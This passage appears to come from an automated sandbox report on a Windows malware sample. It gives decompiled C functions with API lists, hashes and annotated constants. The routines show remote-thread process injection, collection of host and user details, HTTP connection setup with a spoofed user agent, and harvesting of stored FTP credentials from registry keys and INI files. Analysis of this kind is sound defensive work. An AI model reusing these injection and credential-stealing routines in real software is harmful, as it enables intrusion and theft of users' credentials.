    • Instruction Fuzzy Hash: 7C119071200200BFDB218F61CD49EBB7BECEB54700B10492EF586E61A0E735A980CB29
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E004092FB(struct HWND__* _a4, struct HRGN__* _a8, int _a12) {
    				void* _t21;
    				int _t22;
    				signed int _t23;
    				struct HWND__* _t27;
    				char* _t31;
    
    				_t27 = _a4;
    				if(( *0x422940 & 0x00000004) == 0 || E004068C0() == 0) {
    					L7:
    					return GetUpdateRgn(_t27, _a8, _a12);
    				} else {
    					_t31 = TlsGetValue( *0x422e14);
    					if(_t31 == 0 || _t27 !=  *((intOrPtr*)(_t31 + 4))) {
    						goto L7;
    					} else {
    						SetRectRgn(_a8,  *(_t31 + 0xc),  *(_t31 + 0x10),  *(_t31 + 0x14),  *(_t31 + 0x18));
    						if(_a12 != 0) {
    							_t22 = SaveDC( *(_t31 + 8));
    							_t23 = SendMessageW(_t27, 0x14,  *(_t31 + 8), 0);
    							asm("sbb eax, eax");
    							 *((intOrPtr*)(_t31 + 0x1c)) =  ~_t23 + 1;
    							RestoreDC( *(_t31 + 8), _t22);
    						}
    						 *_t31 = 1;
    						_t21 = 2;
    						return _t21;
    					}
    				}
    			}

    APIs
    • GetUpdateRgn.USER32 ref: 00409383
      • Part of subcall function 004068C0: WaitForSingleObject.KERNEL32(00000000,0041D437), ref: 004068C8
    • TlsGetValue.KERNEL32 ref: 0040931B
    • SetRectRgn.GDI32(?,?,?,?,?), ref: 0040933B
    • SaveDC.GDI32(?), ref: 0040934B
    • SendMessageW.USER32(?,00000014,?,00000000), ref: 0040935B
    • RestoreDC.GDI32(?,00000000), ref: 0040936D
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
    • String ID:
    • API String ID: 3142230470-0
    • Opcode ID: f34a37116e45c514fbda48e611fcff6800e8d0e55dc362117a8d25819de3b1e6
    • Instruction ID: d6fa26c7c848dfcd021c0d53a8b22b7b3f5e57c32709c2bd51f0694b49955477
    • Opcode Fuzzy Hash: f34a37116e45c514fbda48e611fcff6800e8d0e55dc362117a8d25819de3b1e6
    • Instruction Fuzzy Hash: 0B115E32000741EBCB325F60ED48F97BBA5EB08711F004A29FA96A16B2C3759850DB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E0041CB12(void* __ecx, long _a4, intOrPtr _a8) {
    				char _v5;
    				void* __edi;
    				void* __esi;
    				void* _t10;
    				void* _t14;
    				void* _t23;
    				void* _t25;
    				void* _t26;
    
    				_t21 = __ecx;
    				_push(__ecx);
    				_v5 = 0;
    				_t23 = OpenProcess(0x47a, 0, _a4);
    				_t28 = _t23;
    				if(_t23 != 0) {
    					_push(_t25);
    					_t10 = E004067D5(_t21, _t23, _t25, _t28, _a8, 0);
    					_t26 = _t10;
    					if(_t26 != 0) {
    						_t14 = CreateRemoteThread(_t23, 0, 0, _t10 -  *0x422954 + E00406F7B, 0, 0, 0);
    						_a4 = _t14;
    						if(_t14 == 0) {
    							VirtualFreeEx(_t23, _t26, 0, 0x8000);
    						} else {
    							WaitForSingleObject(_t14, 0x2710);
    							CloseHandle(_a4);
    							_v5 = 1;
    						}
    					}
    					CloseHandle(_t23);
    				}
    				return _v5;
    			}

    APIs
    • OpenProcess.KERNEL32(0000047A,00000000,74B5F560,00000000,74B5F560,?,?,0041CCD4,?,?,00000000), ref: 0041CB26
    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-008298CF,00000000,00000000,00000000), ref: 0041CB54
    • WaitForSingleObject.KERNEL32(00000000,00002710,?,0041CCD4,?,?,00000000), ref: 0041CB67
    • CloseHandle.KERNEL32(74B5F560,?,0041CCD4,?,?,00000000), ref: 0041CB70
    • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,0041CCD4,?,?,00000000), ref: 0041CB84
    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,0041CCD4,?,?,00000000), ref: 0041CB8B
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
    • String ID:
    • API String ID: 14861764-0
    • Opcode ID: 23cf972acba29a92566a51045638cc5e2432999681839c50ad8adfebcf9d60ec
    • Instruction ID: d9d8660a0b7752b732fc63819e24d66d8c00562a315f4a793faf74c25ff5c16b
    • Opcode Fuzzy Hash: 23cf972acba29a92566a51045638cc5e2432999681839c50ad8adfebcf9d60ec
    • Instruction Fuzzy Hash: 830192B21441487FE7002F64ADC9DBF3F6CDB493A4B004169F606F6160C6795C858679
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 41%
    			E00404DC9(char* __ecx, void* __edx, signed int _a4, signed int _a8) {
    				char _v5;
    				signed int _v12;
    				char _v20;
    				char _v64;
    				char _v552;
    				char _v556;
    				short _v588;
    				void* __ebx;
    				void* __esi;
    				signed int _t62;
    				signed int _t64;
    				signed int _t65;
    				signed short _t71;
    				signed short _t75;
    				void* _t92;
    				void* _t95;
    				void* _t97;
    				signed short _t99;
    				void* _t100;
    				void* _t101;
    				void* _t102;
    				void* _t103;
    				void* _t104;
    				void* _t105;
    				void* _t109;
    				signed int _t111;
    				char* _t112;
    				void* _t113;
    
    				_t109 = __edx;
    				_t106 = __ecx;
    				_t111 = _a4;
    				_t114 =  *_t111;
    				_t99 = 1;
    				_v5 = 0;
    				if( *_t111 == 0) {
    					_t97 = E0041BD10(_t114);
    					 *_t111 = _t97;
    					if(_t97 == 0) {
    						return 0;
    					}
    					_v5 = 1;
    				}
    				__eflags = _a8 & 0x00000001;
    				if(__eflags == 0) {
    					L9:
    					__eflags = _a8 & 0x00000002;
    					if((_a8 & 0x00000002) != 0) {
    						_push( &_v12);
    						_push(0x20000);
    						_push(0x2713);
    						_t105 = 4;
    						_v12 = 0x1050809;
    						_t99 = E0041BD24(_t111, _t105);
    					}
    					L11:
    					__eflags = _a8 & 0x00000004;
    					if((_a8 & 0x00000004) == 0) {
    						L16:
    						__eflags = _t99;
    						if(_t99 == 0) {
    							L32:
    							__eflags = _v5 - 1;
    							if(_v5 == 1) {
    								E00416421( *_t111);
    								 *_t111 =  *_t111 & 0x00000000;
    								__eflags =  *_t111;
    							}
    							L34:
    							return _t99;
    						}
    						__eflags = _a8 & 0x00000008;
    						if((_a8 & 0x00000008) == 0) {
    							L20:
    							__eflags = _t99;
    							if(_t99 == 0) {
    								goto L32;
    							}
    							__eflags = _a8 & 0x00000010;
    							if((_a8 & 0x00000010) == 0) {
    								L28:
    								__eflags = _t99;
    								if(_t99 == 0) {
    									goto L32;
    								}
    								__eflags = _a8 & 0x00000020;
    								if((_a8 & 0x00000020) != 0) {
    									E00404D15(_t106, _t111, 2);
    									E00404D15(_t106, _t111, 0x17);
    								}
    								goto L34;
    							}
    							_t62 = GetModuleFileNameW(0,  &_v588, 0x103);
    							_a4 = _t62;
    							__eflags = _t62;
    							if(_t62 != 0) {
    								__eflags = 0;
    								 *((short*)(_t113 + _t62 * 2 - 0x248)) = 0;
    								_t106 =  &_v588;
    								_t99 = E0041BDD1(_t62,  &_v588, _t109, 0, _t111, 0x271e);
    							}
    							_a4 = 0x104;
    							__eflags = _t99;
    							if(_t99 == 0) {
    								goto L32;
    							} else {
    								_t64 =  &_v588;
    								__imp__GetUserNameExW(2, _t64,  &_a4); // 2 = NameSamCompatible (DOMAIN\user); _a4 = 0x104 is the buffer size in chars; stored as item 0x271f
    								__eflags = _t64;
    								if(_t64 != 0) {
    									_t65 = _a4;
    									__eflags = _t65;
    									if(_t65 != 0) {
    										__eflags = 0;
    										 *((short*)(_t113 + _t65 * 2 - 0x248)) = 0;
    										_t106 =  &_v588;
    										_t99 = E0041BDD1(_t65,  &_v588, _t109, 0, _t111, 0x271f);
    									}
    								}
    								goto L28;
    							}
    						}
    						_t112 =  &_v20;
    						E0040745C(_t112);
    						_push(_t112);
    						_push(0x20000);
    						_push(0x271c);
    						_t100 = 6;
    						_t71 = E0041BD24(_a4, _t100);
    						_t99 = _t71;
    						__eflags = _t99;
    						if(_t99 == 0) {
    							_t111 = _a4;
    							goto L32;
    						}
    						__imp__GetUserDefaultUILanguage();
    						_v12 = _t71 & 0x0000ffff;
    						_push( &_v12);
    						_push(0x20000);
    						_push(0x271d);
    						_t101 = 2;
    						_t75 = E0041BD24(_a4, _t101);
    						_t111 = _a4;
    						_t99 = _t75;
    						goto L20;
    					}
    					__eflags = _t99;
    					if(_t99 == 0) {
    						goto L32;
    					}
    					_v12 = E00416523();
    					_push( &_v12);
    					_push(0x20000);
    					_push(0x2719);
    					_t102 = 4;
    					_t99 = E0041BD24(_t111, _t102);
    					__eflags = _t99;
    					if(_t99 == 0) {
    						goto L32;
    					}
    					_v12 = E0041654B();
    					_push( &_v12);
    					_push(0x20000);
    					_push(0x271b);
    					_t103 = 4;
    					_t99 = E0041BD24(_t111, _t103);
    					__eflags = _t99;
    					if(_t99 == 0) {
    						goto L32;
    					}
    					_v12 = GetTickCount();
    					_push( &_v12);
    					_push(0x20000);
    					_push(0x271a);
    					_t104 = 4;
    					_t99 = E0041BD24(_t111, _t104);
    					goto L16;
    				}
    				_t92 = E00406A66(_t106,  &_v556);
    				_t106 =  &_v552;
    				_t99 = E0041BDD1(_t92,  &_v552, _t109, __eflags, _t111, 0x2711);
    				__eflags = _t99;
    				if(_t99 == 0) {
    					goto L11;
    				}
    				_t95 = E00406BC4( &_v552,  &_v64);
    				__eflags = _v64;
    				if(__eflags != 0) {
    					_t106 =  &_v64;
    					_t99 = E0041BDD1(_t95,  &_v64, _t109, __eflags, _t111, 0x2712);
    				}
    				__eflags = _t99;
    				if(_t99 == 0) {
    					goto L11;
    				}
    				goto L9;
    			}

    APIs
    • GetTickCount.KERNEL32 ref: 00404EC8
    • GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?), ref: 00404F1B
    • GetModuleFileNameW.KERNEL32(00000000,?,00000103), ref: 00404F5D
    • GetUserNameExW.SECUR32(00000002,?,00000104), ref: 00404F9F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: NameUser$CountDefaultFileLanguageModuleTick
    • String ID:
    • API String ID: 2256650695-3916222277
    • Opcode ID: 41c893dedcde754bc6b00b0ad1fa3d9c49c343d2c9f91b85bb6b7d5f9a6a7e2b
    • Instruction ID: 2fd615251f10e6357daf40c36cdb67df8a25334fb9d75881f247c1eb6ac5e9f4
    • Opcode Fuzzy Hash: 41c893dedcde754bc6b00b0ad1fa3d9c49c343d2c9f91b85bb6b7d5f9a6a7e2b
    • Instruction Fuzzy Hash: 8E51CB716402597ADB21DB65E849FEE7BB8EF41304F04406BFE44BB2D2D7788A84CB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E004074DB(void* _a4, WCHAR* _a8) {
    				char _v40;
    				char _v160;
    				char _v680;
    				void* __edi;
    				void* __esi;
    				void** _t11;
    				void* _t13;
    				void* _t16;
    				void* _t18;
    				void* _t23;
    				void* _t28;
    				void* _t30;
    				WCHAR* _t34;
    
    				_t11 =  &_a4;
    				_t28 = 0;
    				__imp__ConvertSidToStringSidW(_a4, _t11);
    				if(_t11 != 0) {
    					_t37 =  &_v160;
    					_t13 = 4;
    					E004159A4(_t13,  &_v160);
    					_push(_a4);
    					_t34 =  &_v680;
    					_t16 = E00417114(_t37, 0x104, _t34, _t37);
    					_pop(_t30);
    					if(_t16 > 0) {
    						_t18 = 5;
    						E004159A4(_t18,  &_v40);
    						_t23 = E0041A545(0x80000002, _t30, _t34, _t34,  &_v40, 0x104); // 0x80000002 = HKEY_LOCAL_MACHINE; E0041A545 opens the key path built from the string SID and reads a value (RegOpenKeyExW + ExpandEnvironmentStringsW per the API list)
    						if(_t23 != 0 && _t23 != 0xffffffff) {
    							PathUnquoteSpacesW(_t34);
    							ExpandEnvironmentStringsW(_t34, _a8, 0x104);
    							asm("sbb bl, bl");
    							_t28 = 1;
    						}
    					}
    					LocalFree(_a4);
    				}
    				return _t28;
    			}

    APIs
    • ConvertSidToStringSidW.ADVAPI32(?,?), ref: 004074EE
    • LocalFree.KERNEL32(?,.exe,00000000), ref: 00407576
      • Part of subcall function 0041A545: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040754A,?,?,00000104,.exe,00000000), ref: 0041A55A
    • PathUnquoteSpacesW.SHLWAPI(?,?,?,00000104,.exe,00000000), ref: 00407556
    • ExpandEnvironmentStringsW.KERNEL32(?,0040F01F,00000104), ref: 00407563
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: ConvertEnvironmentExpandFreeLocalOpenPathSpacesStringStringsUnquote
    • String ID: .exe
    • API String ID: 2200435814-4119554291
    • Opcode ID: 7e2a428bb6e2cc21f376435b3d0e521db17d762af8ba8b1e273611cbb8b174f9
    • Instruction ID: c524d25b66dfa68a5e9464f8b639f51a0aa30363f0ad966ac87bb6cf3026e4c4
    • Opcode Fuzzy Hash: 7e2a428bb6e2cc21f376435b3d0e521db17d762af8ba8b1e273611cbb8b174f9
    • Instruction Fuzzy Hash: BF11C671A40114BBDF10AB79ED09ECB3BADDF85364F100426B948F71A0D734DA44CBA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00417FF5(signed int __eax, char* __ecx) {
    				short _v28;
    				char* _v32;
    				signed int _t5;
    				void* _t12;
    				void* _t14;
    				char* _t15;
    				void* _t18;
    
    				_t15 = __ecx;
    				_t5 = __eax;
    				if(__ecx == 0) {
    					_t15 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)";
    				}
    				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0); // dwAccessType: 1 = INTERNET_OPEN_TYPE_DIRECT, 0 = INTERNET_OPEN_TYPE_PRECONFIG (system proxy settings)
    				if(_t14 == 0) {
    					L7:
    					return 0;
    				}
    				_t18 = 0;
    				do {
    					_t1 = _t18 + 0x42200c; // 0x42200c
    					_t2 = _t18 + 0x422008; // 0x2
    					InternetSetOptionA(_t14,  *_t2, _t1, 4); // three {option, DWORD value} pairs from a table at 0x422008; the first is option 2 = INTERNET_OPTION_CONNECT_TIMEOUT
    					_t18 = _t18 + 8;
    				} while (_t18 < 0x18);
    				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0); // server name/port come from _v32/_v28, which this function never writes (caller-supplied; the decompiler lost their origin); 3 = INTERNET_SERVICE_HTTP
    				if(_t12 == 0) {
    					InternetCloseHandle(_t14);
    					goto L7;
    				}
    				return _t12;
    			}

    APIs
    • InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 0041800C
    • InternetSetOptionA.WININET(00000000,00000002,0042200C,00000004), ref: 0041802B
    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00418048
    • InternetCloseHandle.WININET(00000000), ref: 00418054
    Strings
    • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 00417FFD, 0041800B
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Internet$CloseConnectHandleOpenOption
    • String ID: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
    • API String ID: 910987326-3737944857
    • Opcode ID: 982633e50cd9bc0491ed2e29a6adb56035a89f89a96023ee7cafa2680c1db6cc
    • Instruction ID: c84b111c3f260741ce95b7a670c63cd2747d5d38314aa6e4c3d07eb6a1cd8523
    • Opcode Fuzzy Hash: 982633e50cd9bc0491ed2e29a6adb56035a89f89a96023ee7cafa2680c1db6cc
    • Instruction Fuzzy Hash: 7BF0F6722002007AD63257614D8CDAB7E6EEBCE761B05082DF646E1071CA358884C738
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00414616(char* __ecx, void* __eflags) {
    				int _v8;
    				void* _v12;
    				signed int _v16;
    				char* _v20;
    				intOrPtr _v24;
    				int _v28;
    				intOrPtr _v32;
    				char _v36;
    				void* _v40;
    				intOrPtr _v44;
    				char* _v48;
    				char _v60;
    				char _v80;
    				char _v100;
    				char _v120;
    				char _v152;
    				char _v216;
    				char _v284;
    				short _v804;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t70;
    				int _t102;
    				int _t110;
    				int _t114;
    				void* _t115;
    				signed int _t117;
    				void* _t119;
    				intOrPtr _t121;
    				void* _t124;
    				intOrPtr _t127;
    				int _t134;
    				intOrPtr _t136;
    				char* _t138;
    				char* _t141;
    				signed int _t145;
    				void* _t146;
    				void* _t147;
    
    				_t129 = __ecx;
    				_t70 = E004163F1(0xc08);
    				_t127 = _t70;
    				_t134 = 0;
    				_v24 = _t127;
    				if(_t127 == 0) {
    					return _t70;
    				} else {
    					E004159A4(0x83,  &_v216);
    					_t141 =  &_v284;
    					E004159A4(0x84, _t141);
    					_v48 =  &_v216;
    					_v44 = _t141;
    					E004164D4( &_v36,  &_v36, 0, 8);
    					E004159A4(0x85,  &_v120);
    					E004159A4(0x86,  &_v100);
    					E004159A4(0x87,  &_v60);
    					_t145 =  &_v80;
    					E004159A4(0x88, _t145);
    					_t12 = _t127 + 0x3fc; // 0x3fc
    					_v20 = _t12;
    					_v16 = 0;
    					do {
    					if(RegOpenKeyExW(0x80000001,  *(_t146 + _v16 * 4 - 0x2c), _t134, 8,  &_v12) != 0) { // HKEY_CURRENT_USER, samDesired 8 = KEY_ENUMERATE_SUB_KEYS; the path is one of the two strings E004159A4 decoded above (IDs 0x83, 0x84)
    							goto L22;
    						}
    						_v28 = _t134;
    						_v8 = 0x104;
    						if(RegEnumKeyExW(_v12, _t134,  &_v804,  &_v8, _t134, _t134, _t134, _t134) != 0) {
    							L21:
    							RegCloseKey(_v12);
    							goto L22;
    						} else {
    							goto L4;
    						}
    						do {
    							L4:
    							_t136 = _v24;
    							_v28 = _v28 + 1;
    							_t102 = E0041A545(_v12, _t129, _t136,  &_v804,  &_v120, 0xff);
    							_t145 = _t145 | 0xffffffff;
    							_v8 = _t102;
    							if(_t102 != _t145 && _t102 != 0) {
    								_t137 = _t136 + 0x1fe;
    								_t110 = E0041A545(_v12, _t129, _t136 + 0x1fe,  &_v804,  &_v100, 0xff);
    								_v8 = _t110;
    								if(_t110 == _t145 || _t110 == 0) {
    									_t114 = E0041A545(_v12, _t129, _t137,  &_v804,  &_v60, 0xff);
    									_v8 = _t114;
    									if(_t114 == _t145 || _t114 == 0) {
    										goto L19;
    									} else {
    										goto L10;
    									}
    								} else {
    									L10:
    									_t115 = _v12;
    									_t129 =  &_v804;
    									_v40 = _t115;
    									if(RegOpenKeyExW(_t115,  &_v804, 0, 1,  &_v40) != 0) { // samDesired 1 = KEY_QUERY_VALUE on the enumerated subkey
    										_t117 = _t145;
    									} else {
    										_t145 =  &_v40;
    										_t117 = E0041A66D(_t145,  &_v80, _t116, _v20, 0xff);
    									}
    									_v8 = _t117;
    									if(_t117 != 0xffffffff && _t117 != 0) {
    										_t138 = _v20;
    										if(E004145BC(_t138) > 0) {
    											_t145 =  &_v152;
    											_t119 = 0x56;
    											E004159A4(_t119, _t145);
    											_t121 = _v24;
    											_push(_t121);
    											_t129 = _t138;
    											_push(_t129);
    											_push(_t121 + 0x1fe);
    											_t51 = _t129 + 0x1fe; // 0x1fe
    											_t124 = E00417114(_t145, 0x307, _t51, _t145);
    											_t147 = _t147 + 0x10;
    											if(_t124 > 0) {
    												_t129 =  &_v36;
    												if(E00416815(_t124,  &_v36, _v20 + 0x1fe) != 0) {
    													_v32 = _v32 + 1;
    												}
    											}
    										}
    									}
    									goto L19;
    								}
    							}
    							L19:
    							_v8 = 0x104;
    						} while (RegEnumKeyExW(_v12, _v28,  &_v804,  &_v8, 0, 0, 0, 0) == 0);
    						_t134 = 0;
    						goto L21;
    						L22:
    						_v16 = _v16 + 1;
    					} while (_v16 < 2);
    					E00416421(_v24);
    					if(_v32 <= _t134) {
    						return E00416421(_v36);
    					}
    					return E0041252D(0x307, _v36, 0xcb);
    				}
    			}

    APIs
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 004146CD
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 004146F8
    • RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 0041484E
      • Part of subcall function 0041A545: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040754A,?,?,00000104,.exe,00000000), ref: 0041A55A
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 0041483B
      • Part of subcall function 0041A545: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0040754A,?,?,00000104), ref: 0041A5DB
    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF,?,00000000), ref: 00414798
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Open$Enum$CloseEnvironmentExpandStrings
    • String ID:
    • API String ID: 2343474859-0
    • Opcode ID: 137cfddf440e73ae495e092153b88a1ed636d46c9a718eee097c781d9cde8df6
    • Instruction ID: 8dfede0f616527f459f3b1a45a83bfba924025500d4dc7406fb916bd56c8917b
    • Opcode Fuzzy Hash: 137cfddf440e73ae495e092153b88a1ed636d46c9a718eee097c781d9cde8df6
    • Instruction Fuzzy Hash: EC714A71D00119AFDB10EFE9CD45AEEB7BCEF88704F10406AAA15F3251D738AE858B65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E004136DC(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
    				short _v524;
    				char _v563;
    				short _v576;
    				short _v588;
    				void* _v600;
    				short _v608;
    				WCHAR* _v612;
    				intOrPtr _v615;
    				WCHAR* _v616;
    				intOrPtr _v619;
    				WCHAR* _v620;
    				WCHAR* _v623;
    				WCHAR* _v624;
    				WCHAR* _v628;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				long _t51;
    				WCHAR* _t54;
    				WCHAR* _t56;
    				void* _t57;
    				void* _t59;
    				void* _t61;
    				void* _t63;
    				long _t67;
    				WCHAR* _t69;
    				long _t77;
    				long _t81;
    				WCHAR* _t83;
    				void* _t84;
    				WCHAR* _t87;
    				WCHAR* _t88;
    				short* _t93;
    				WCHAR* _t94;
    				int _t103;
    				WCHAR* _t108;
    				intOrPtr _t115;
    				signed int _t116;
    				void* _t118;
    
    				_t118 = (_t116 & 0xfffffff8) - 0x26c;
    				if(E0041BCB4( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
    					L20:
    					return 1;
    				}
    				_t121 =  *__edx & 0x00000010;
    				if(( *__edx & 0x00000010) == 0) {
    					_t108 = E004163F1(0x1fffe);
    					_v612 = _t108;
    					__eflags = _t108;
    					if(_t108 == 0) {
    						goto L20;
    					}
    					_t51 = GetPrivateProfileStringW(0, 0, 0, _t108, 0xffff,  &_v524); // NULL section and key: fills _t108 with every section name of the INI (NUL-separated); E0041730D below steps to the next name (inferred)
    					__eflags = _t51;
    					if(_t51 == 0) {
    						L19:
    						E00416421(_t108);
    						goto L20;
    					}
    					_t9 = _t51 + 1; // 0x1
    					_t54 = E004172D1(_t108, _t9);
    					__eflags = _t54;
    					if(_t54 == 0) {
    						goto L19;
    					}
    					_t56 = E004163F1(0xc1c);
    					_v620 = _t56;
    					__eflags = _t56;
    					if(_t56 == 0) {
    						goto L19;
    					} else {
    						_t11 =  &(_t56[0xff]); // 0x1fe
    						_t93 = _t11;
    						_v624 = _t108;
    						_v616 = _t93;
    						_t57 = 0x5c;
    						_t94 =  &(_t93[0xff]);
    						__eflags = _t94;
    						E004159A4(_t57,  &_v608);
    						_t59 = 0x5d;
    						E004159A4(_t59,  &_v588);
    						_t61 = 0x5e;
    						E004159A4(_t61,  &_v576);
    						_t63 = 0x5f;
    						E004159A4(_t63,  &_v600);
    						goto L8;
    						L17:
    						_t69 = E0041730D(_v624, 1);
    						_v628 = _t69;
    						__eflags = _t69;
    						if(_t69 != 0) {
    							L8:
    							_t67 = GetPrivateProfileStringW(_v624,  &_v608, 0, _v620, 0xff,  &_v524);
    							__eflags = _t67;
    							if(_t67 != 0) {
    								_t103 = GetPrivateProfileIntW(_v624,  &_v588, 0x15,  &_v524); // default 0x15 = 21, the FTP control port
    								_t25 = _t103 - 1; // -1
    								__eflags = _t25 - 0xfffe;
    								if(_t25 <= 0xfffe) { // unsigned (port - 1) <= 0xfffe, i.e. 1 <= port <= 65535
    									_t77 = GetPrivateProfileStringW(_v624,  &_v576, 0, _v616, 0xff,  &_v524);
    									__eflags = _t77;
    									if(_t77 != 0) {
    										_push( &_v524);
    										_push(0xff);
    										_push(_t94);
    										_push(0);
    										_t118 = _t118 + 1;
    										_t81 = GetPrivateProfileStringW(_v623,  &_v600 & 0x00000034, ??, ??, ??, ??);
    										__eflags = _t81;
    										if(_t81 != 0) {
    											_t83 = E004135CF(_v623, _t94);
    											__eflags = _t83;
    											if(_t83 > 0) {
    												_t114 =  &_v563;
    												_t84 = 0x55;
    												E004159A4(_t84,  &_v563);
    												_push(_t103);
    												_push(_v619);
    												_push(_t94);
    												_push(_v615);
    												_t37 =  &(_t94[0xff]); // 0x1fe
    												_t104 = _t37;
    												_t87 = E00417114( &_v563, 0x311, _t37, _t114);
    												_t118 = _t118 + 0x14;
    												__eflags = _t87;
    												if(_t87 > 0) {
    													_t115 = _a4;
    													_t88 = E00416815(_t87, _t115, _t104);
    													__eflags = _t88;
    													if(_t88 != 0) {
    														_t39 = _t115 + 4;
    														 *_t39 =  &(( *(_t115 + 4))[0]);
    														__eflags =  *_t39;
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    							goto L17;
    						} else {
    							E00416421(_v620);
    							_t108 = _v616;
    							goto L19;
    						}
    					}
    				} else {
    					E00413682(_t121,  &_v524, _a4);
    					goto L20;
    				}
    			}

    APIs
      • Part of subcall function 0041BCB4: PathCombineW.SHLWAPI(?,a@,?,004061E6,?,?), ref: 0041BCD3
    • GetPrivateProfileStringW.KERNEL32 ref: 00413743
    • GetPrivateProfileStringW.KERNEL32 ref: 004137D7
    • GetPrivateProfileIntW.KERNEL32 ref: 004137F5
    • GetPrivateProfileStringW.KERNEL32 ref: 00413820
    • GetPrivateProfileStringW.KERNEL32 ref: 0041383C
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: PrivateProfile$String$CombinePath
    • String ID:
    • API String ID: 2134968610-0
    • Opcode ID: 3fa68b634ba682679769f0e5932c82a26f38bc34b3de735d1b29c67a8890a625
    • Instruction ID: b4d08900939bbce0642cbb8a32366c1cd8d218b0d58d2888e15fd907c27e94a2
    • Opcode Fuzzy Hash: 3fa68b634ba682679769f0e5932c82a26f38bc34b3de735d1b29c67a8890a625
    • Instruction Fuzzy Hash: B651E731504706EBE710AF51CC05BEB77E8EF84759F00082EFA44E71A1D738DA858B6A
    Uniqueness

    Uniqueness Score: -1.00%
